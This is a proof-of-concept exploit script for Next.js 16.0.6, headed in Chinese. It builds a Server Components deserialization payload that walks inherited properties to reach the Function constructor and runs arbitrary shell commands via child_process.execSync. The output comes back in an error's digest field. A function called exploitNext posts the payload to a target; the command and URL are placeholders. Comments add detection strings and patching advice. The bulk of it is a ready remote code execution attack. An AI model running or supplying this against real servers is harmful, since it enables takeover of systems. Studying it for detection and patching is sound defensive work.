Next.js 16.0.6 版本漏洞 PoC
执行结果会出现在 digest 属性中。
// Request-body fixture for this PoC. Each numeric top-level key is later sent
// as one multipart field whose value is the JSON serialization of the entry.
// NOTE(review): the "$"-prefixed strings look like React Server Components
// (Flight) reference syntax, where "$N:a:b" names a property path on chunk N.
// Confirm against the deserializer version actually deployed.
// Defensive reading: a legitimate client has no reason to send these shapes.
// A POST that carries a `next-action` header together with fields containing
// "resolved_model", "_response", "_prefix" or ":constructor:constructor" is a
// strong signal for WAF and log-detection rules. Request filtering is only a
// stopgap; the durable fix is upgrading to a release the vendor lists as patched.
const payload = {
0: "$1",
1: {
// Hand-written object that appears to imitate the deserializer's own internal
// chunk record (status / value / then / _response). TODO confirm field names
// against the framework source.
status: "resolved_model",
reason: 0,
_response: "$4",
value: '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
then: "$2:then",
},
2: "$@3",
// Empty array; the reference paths above and below walk its inherited properties.
3: [],
4: {
_prefix:
// JavaScript source carried as a string. It runs a shell command through
// child_process.execSync (5000 ms timeout; the command is a Chinese placeholder
// meaning "command to execute") and throws an Error with message
// 'NEXT_REDIRECT' whose `digest` holds the command output. That is why the page
// header says the result appears in the digest attribute.
"var res = process.mainModule.require('child_process').execSync('【待执行命令】', {'timeout': 5000}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `${res}`});//",
_formData: {
// Chunk 3 is an array, so this path leaves own properties:
// [].constructor.constructor is the Function constructor.
// NOTE(review): presumably the root cause is a deserializer that follows
// inherited properties in reference paths; an own-property check on every path
// segment would be the matching hardening. Verify against the vendor fix.
get: "$3:constructor:constructor",
},
_chunks: "$2:_response:_chunks",
},
};
import FormDataLib from "form-data";
// Encode the payload as multipart/form-data: one field per top-level key, with
// the entry's JSON text as the field value.
const fd = new FormDataLib();
for (const [fieldName, fieldValue] of Object.entries(payload)) {
  fd.append(fieldName, JSON.stringify(fieldValue));
}
// Print the exact body bytes and the generated headers (including the
// multipart boundary). This output shows what the request looks like on the
// wire, so it can be compared with captured traffic when writing a detection rule.
console.log(fd.getBuffer().toString());
console.log(fd.getHeaders());
/**
 * POSTs the multipart body built in `fd` to `baseUrl` with a `next-action`
 * header, then logs the Response object and its body text.
 *
 * The promise chain is not returned and has no rejection handler, so the
 * function returns `undefined` and a network failure surfaces as an unhandled
 * rejection.
 *
 * Detection note: the request is distinguishable by the `next-action: x`
 * header on a multipart POST; per the page header, the command output is
 * expected in the `digest` attribute of the returned error.
 *
 * @param {string} baseUrl - URL the request is sent to.
 * @returns {void}
 */
function exploitNext(baseUrl) {
  const requestHeaders = {
    "next-action": "x",
    ...fd.getHeaders(),
  };
  const requestInit = {
    method: "POST",
    headers: requestHeaders,
    body: fd.getBuffer(),
  };

  const readBody = (response) => {
    console.log("fetched", response);
    return response.text();
  };
  const logBody = (bodyText) => {
    console.log("got", bodyText);
  };

  fetch(baseUrl, requestInit).then(readBody).then(logBody);
}
// The argument is a placeholder, not a URL: the Chinese text reads
// "environment address, e.g. http://localhost:3000/". As written, the string is
// passed to fetch unchanged.
exploitNext("【环境地址,比如http://localhost:3000/】");